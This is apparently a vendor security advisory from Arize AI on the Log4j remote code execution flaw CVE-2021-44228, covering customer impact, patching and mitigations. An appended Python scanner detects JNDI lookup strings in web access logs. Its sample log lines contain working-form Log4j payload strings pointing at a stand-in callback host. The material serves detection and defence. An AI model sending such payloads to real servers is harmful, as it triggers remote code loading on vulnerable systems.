2021-12-15: CVE-2021-44228

Summary

Log4j, an open-source library used widely in products worldwide, was reported on 2021-12-09 to have a critical vulnerability, now published as CVE-2021-44228.

This vulnerability allows remote code execution and is easy enough to trigger that it carries a CVSS score of 10.

This vulnerability has been fixed in log4j-2.15.0 and greater.

More information from the National Vulnerability Database can be found (here).

As an Arize AI customer am I impacted?

Arize teams followed our security protocol starting 2021-12-10 09:03; the conclusion of our Vulnerability Analysis report follows.

Although the vulnerability is not directly exposed, we have updated the impacted internal components to log4j-2.16.0 so that future exploits are not possible in any case.

SAAS Platform

No action is required on your end, we are running our latest environment.

On-Prem

Please reach out to Arize to follow the procedure to update your environment.

Mitigation controls that prevent exploitation

  • An egress-filtering firewall would prevent the exploit payload from being loaded.

  • A Web Application Firewall can catch the exploit payload before it reaches the server.

  • Close monitoring of the server process with an Intrusion Detection System would also detect the abnormal behavior of the application.
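Detection logic of the kind the WAF and IDS controls above rely on, as an added example that is not part of the Arize advisory: a small Python scanner that flags HTTP access-log lines carrying the Log4j JNDI lookup string and counts hits per source address, which is the signal a defender would alert on. The log lines, addresses and host name are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample access-log lines (not real traffic): one benign request,
# one with a lookup string in the User-Agent, one in a query parameter.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:09:03:11 +0000] "GET /api/health HTTP/1.1" 200 17 "-" "curl/7.79.1"
198.51.100.7 - - [10/Dec/2021:09:03:12 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example/a}"
198.51.100.7 - - [10/Dec/2021:09:03:14 +0000] "GET /search?q=${JNDI:rmi://callback.example/b} HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# Match the Log4j lookup prefix regardless of case and capture the scheme,
# so the alert can say which kind of callback (ldap, rmi, dns, ...) was requested.
LOOKUP_RE = re.compile(r"\$\{\s*jndi:(?P<scheme>[a-z]+)", re.IGNORECASE)


def scan_line(line):
    """Return (source_ip, scheme) if the line carries a JNDI lookup, else None."""
    m = LOOKUP_RE.search(line)
    if m is None:
        return None
    source_ip = line.split(" ", 1)[0]  # first field of a common-log-format line
    return source_ip, m.group("scheme").lower()


def scan_log(text):
    """Return (hits per source address, ordered list of (ip, scheme) findings)."""
    findings = [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]
    return Counter(ip for ip, _ in findings), findings


if __name__ == "__main__":
    counts, findings = scan_log(SAMPLE_LOG)
    for ip, scheme in findings:
        print(f"ALERT: JNDI lookup ({scheme}) from {ip}")
    print("hits per source:", dict(counts))
```

A match means a client sent the lookup string, not that the server was vulnerable; correlate with outbound connections from the application host to confirm exploitation.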
